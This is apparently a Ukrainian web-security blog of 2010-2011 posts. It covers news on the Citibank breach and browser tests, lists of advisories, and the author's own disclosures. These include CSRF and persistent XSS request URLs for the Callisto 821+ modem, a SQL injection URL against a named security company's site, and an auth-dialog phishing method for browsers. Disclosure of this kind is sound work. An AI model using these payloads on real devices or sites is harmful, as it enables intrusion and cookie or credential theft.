Websecurity - Веб безпека

За повідомленням hackzona.com.ua, хакери зламали Citibank через уразливість в web-інтерфейсі.

Згідно з інформацією The New York Times, зловмисники змогли отримати доступ до особистих даних клієнтів Citibank через уразливість в web-інтерфейсі. На сайті присутня уразливість, яка дозволяла зловмисникові шляхом зміни ідентифікатора користувача в адресному рядку браузера переглянути особисті дані довільного клієнта банку.

Представники Citibank офіційно підтвердили крадіжку номерів кредитних карт і уточнили кількість постраждалих від хакерської атаки клієнтів. У загальній складності витік торкнувся приблизно 360000 кредитних карт.

Що цікаво, то назабаром після цього інцеденту я почув згадку про нього в новинах по радіо. І при цьому в новинах згадувалося, що Visa і MasterСard, які самі мають діряві сайти, після цього інцеденту з сайтом Citibank, будуть вимагати від банків (та всіх хто працює з пластиковими картками) дотримуватися більш сурових вимог безпеки. При тому, що SQL ін’єкцій на сайті даного банку бути не повинно було, якщо б вони дотримувалися PCI DSS. А про справжню безпеку сайтів із секюріті логотипами я вже розповідав. Тому варто було б їм не базікати, а дотримуватися існуючих стандартів, як всім хто працює з картками включаючи банки, так і самим власникам платіжних систем, таким як Visa і MasterСard (сайт якої нещодавно взломали).

За повідомленням www.xakep.ru, у Британії засуджені троє фішерів.

Троє чоловіків були присуджені в цілому до 13,5 років тюремного ув’язнення за їхню участь у витонченій атаці на міжнародну банківську систему.

Розслідування було сфокусовано на групі людей, що систематично добували велику кількість особистої інформації (такий як паролі до банківських акаунтів і номера кредитних карт) через фішинг і потім крали гроші з банківських акаунтів і шахрайським чином використовували дані кредитних карт.

За повідомленням www.opennet.ru, оцінка ефективності блокування веб браузерами шкідливих лінок.

Дослідники з лабораторії NSS провели дослідження ефективності роботи вбудованих у сучасні браузери засобів для захисту користувача від атак, пов’язаних з використанням методів соціальної інженерії для поширення шкідливого ПЗ. Окремо слід зазначити, що в дослідженні врахована лише можливість захисту від переходу по спеціально сформованих прямих лінок на шкідливе ПЗ, без врахування засобів блокування відкриття шкідливих веб сторінок і блокування виконання шкідливого коду.

Цього разу перші місця зайняли IE9 та IE8. Про попередні дослідження NSS Labs я вже писав - тоді двічі перше місце займав IE8. Результат передбачуваний, як це завжди буває в проплачених Майкрософт дослідженнях .

В цьому місяці в журналі “Системный администратор” була опублікована моя стаття. В липневому номері журналу, що вийшов нещодавно, опублікована стаття “Веб-антивирусы. Системы выявления инфицированных сайтов”.

В ній розповідається про нову загрозу Інтернета - віруси на сайтах і методи боротьби з ними, серед яких важливу роль відіграють системи виявлення інфікованих сайтів.

Так що кому буде цікаво прочитати дану статтю (та іншу цікаву інформацію в даному номері), як тим хто вже читав мої статті чи інтерв’ю в журналі Фокус та інших журналах , так і всім іншим, можете дістати собі номер 7-8 журнала “Системний адміністратор”.

P.S.

Виклав на сайті повну версію статті Веб-антивирусы. Системы выявления инфицированных сайтов.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести CSRF або XSS атаку.

CSRF:

Кожен конекшен в розділі LAN connections, як дефолтний, так й інші конекшени, мають розширені налаштування. Розглянемо на прикладі дефолтного конекшена (iplan).

В розділі Edit connection в підрозділі Edit Ip Interface (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan) через CSRF можна змінювати нашалтування (IP, Mask та інші) конекшена.

В підрозділі Edit Tcp Mss Clamp (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp) через CSRF можна змінювати нашалтування конекшена.

В підрозділі Edit Rip Versions (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImRipVersions) через CSRF можна змінювати нашалтування конекшена.

В підрозділі Edit NAT (http://192.168.1.1/configuration/edit-form.html? ImRouter.ImIpInterfaces.iplan.ImNatHelper) через CSRF можна змінювати нашалтування конекшена.

XSS:

В вищезгаданих чотирьох підрозділах розділа Edit connection є багато persistent XSS уразливостей.

В підрозіділі Edit Ip Interface:

http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E

В підрозділах Edit Tcp Mss Clamp, Edit Rip Versions та Edit NAT аналогічна ситуація.

А також можливі атаки через імена параметрів (коли XSS код задається в імені параметра), про що я писав раніше.

В даному випадку код виконається одразу, а також при відвіданні сторінок http://192.168.1.1/system/events.html і http://192.168.1.1/shared/event_log_selection.html.

В даній добірці уразливості в веб додатках:

• HP StorageWorks X9000 Network Storage Systems, Remote Unauthenticated Access (деталі)
• SECURITY ADVISORY IBM Cognos 8 Business Intelligence 8.4.1 (деталі)
• SCO Openserver IMAP Daemon Long Verb Parsing Remote Code Execution Vulnerability (деталі)
• Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue (деталі)
• IBM Lotus Notes cai URI Handler Remote Code Execution Vulnerability (деталі)
• ‘Seo Panel’ Cookie-Rendered Persistent XSS Vulnerability (деталі)
• Multiple vulnerabilities in Subversion (деталі)
• Accellion File Transfer Appliance Multiple Vulnerabilities (деталі)
• Simploo CMS Community Edition - Remote PHP Code Execution Issue (деталі)
• DotNetNuke Remote Code Execution vulnerability (деталі)

В липні місяці Microsoft випустила 4 патчі. Що значно менше ніж у червні.

У липневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 4 бюлетені по безпеці. Що закривають 22 уразливості в програмних продуктах компанії. Зокрема один патч закриває критичну уразливість, а інші три патчі виправляють важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7 та 2008 R2. А також Microsoft Visio 2003.

19.10.2010

У липні, 02.07.2010, я знайшов SQL Injection уразливість на http://varta.net.ua - сайті секюріті компанії. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.07.2011

SQL Injection:

http://varta.net.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

26.03.2011

Ще 06.02.2008 я виявив URL Spoofing уразливість в Mozilla Firefox, Internet Explorer, Google Chrome та Opera (спочатку в Mozilla та Internet Explorer, а вже потім протестував в Chrome, Opera та нових версіях Firefox та IE, коли поставив собі ці браузери). Інші браузери без сумніву також уразливі. Про що найближчим часом повідомлю розробникам.

Дану уразливість я виявив коли досліджував вбудований CSRF в Mozilla та Firefox. Атаку я назвав Onsite phishing (Inline phishing). Вона може бути використана (в тому числі фішерами) для викрадення облікових даних користувачів веб сайтів.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам браузерів.

21.07.2011

Дана атака на браузери може використовуватися (в тому числі фішерами) для викрадення логінів і паролів користувачів сайтів.

Як я протестував, багато різних методів (з використанням тегів і CSS), що дозволяють робити міжсайтові запити, може бути використано для проведення даної атаки. Окрім префетчінга (у всіх браузерах на движку Gecko, що пітримують функцію prefetching), що не виводить вікно аутентифікації при отриманні 401 відповіді від веб сервера. Наступні методи можуть бути використані:

Теги img, script, iframe, frame, embed, link (css) - Mozilla, Firefox, IE, Google Chrome та Opera.
Тег object - Internet Explorer, Google Chrome та Opera.
CSS (inline, в html файлах, в зовнішніх css файлах): такі як -moz-binding:url - Mozilla та Firefox < 3.0, такі як background-image:url - в усіх браузерах.

Ось скріншоти атаки на різні браузери (в Firefox 3.0.19, 3.5.x, 3.6.x. 4.0b2 діалогове вікно виглядає майже однаково):

Attack on Mozilla
Attack on Firefox
Attack on IE6
Attack on IE7
Attack on IE8
Attack on Chrome
Attack on Opera

Атака може бути зроблена як відбита (reflected) на цільовому сайті, так і постійна (persistent), з використанням дозволеного функціонала на цільовому сайті, який дозволяє розміщувати деякі теги, наприклад, тег img. Persistent атака є більш небезпечною (і саме цей тип атаки показаний на скріншотах).

Уразливі Mozilla Firefox, Internet Explorer, Google Chrome, Opera та всі інші браузери, що підтримують Basic/Digest Authentication (а це всі сучасні та більшість старих браузерів).

В березні, після мого увідомлення, Mozilla відкрила Bug 647010 в Bugzilla для цієї уразливості.

І лише Мозіла з чотирьох розробників браузерів, яким я повідомив, заявила, що вони планують виправити цю дірку (але не уточнюючи коли саме). Той же Гугл мені навіть не відповів, але в середині червня представники компанії Google заявили в своєму блозі, що в браузерах Chrome 13 і вище (а минулого місяця вийшла 12 версія, а 13 знаходиться у стані бета версії) вони виправили дану уразливість. Шляхом заборони виведення вікна аутентифікації для ресурсів з інших доменів.

Подібна несерйозна поведінка Гугла є ламерською, коли виправляють дірки втихаря, не відповівши і не подякувавши людині, яка про них повідомила. Не поважаю компанії з такою поведінкою. І з такими випадками я вже стикався в минулі роки від Mozilla, Microsoft та Opera, тому нічого нового - типова ламерська поведінка виробників браузерів. Але цей крок Google має стимулювати інших виробників браузерів виправити дану уразливість в своїх продуктах.

В своїй презентації Guidelines on Securing Public Web Servers, представники National Institute of Standards and Technology (NIST) розповідають про забезпечення безпеки публічних веб серверів. Це офіційні рекомендації американського NIST (датовані 2007 роком).

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.kuzovok.kiev.ua (хакерами з S.V Crew) - 03.05.2011, зараз сайт вже виправлений адмінами
• http://www.forumbc.com.ua (хакерами з S.V Crew) - причому спочатку сайт 03.05.2011 був взломаний S.V Crew, а зараз він взломаний Sifreciler. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://www.citroen-mas.kiev.ua (хакером iskorpitx) - 03.05.2011, зараз сайт вже виправлений адмінами
• http://photolives.com.ua (хакерами з RKH)
• http://uoz.sumy.ua (хакерами з RKH)

В даній добірці уразливості в веб додатках:

• HP Data Protector Backup Client Service EXEC_BAR Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in WonderCMS (деталі)
• Hewlett-Packard Data Protector Cell Manager Service Authentication Bypass Vulnerability (деталі)
• SQL Injection in phpMySport (деталі)
• Hewlett-Packard Data Protector Client EXEC_SETUP Remote Code Execution Vulnerability (деталі)
• SQL Injection in phpMySport (деталі)
• Hewlett-Packard Data Protector Client EXEC_CMD Perl Remote Code Execution Vulnerability (деталі)
• XSS vulnerability in PHP MicroCMS (деталі)
• Hewlett-Packard Data Protector Client EXEC_CMD omni_chk_ds.sh Remote Code Execution Vulnerability (деталі)
• Drupal 5.x, 6.x <= Stored Cross Site Scripting Vulnerability (деталі)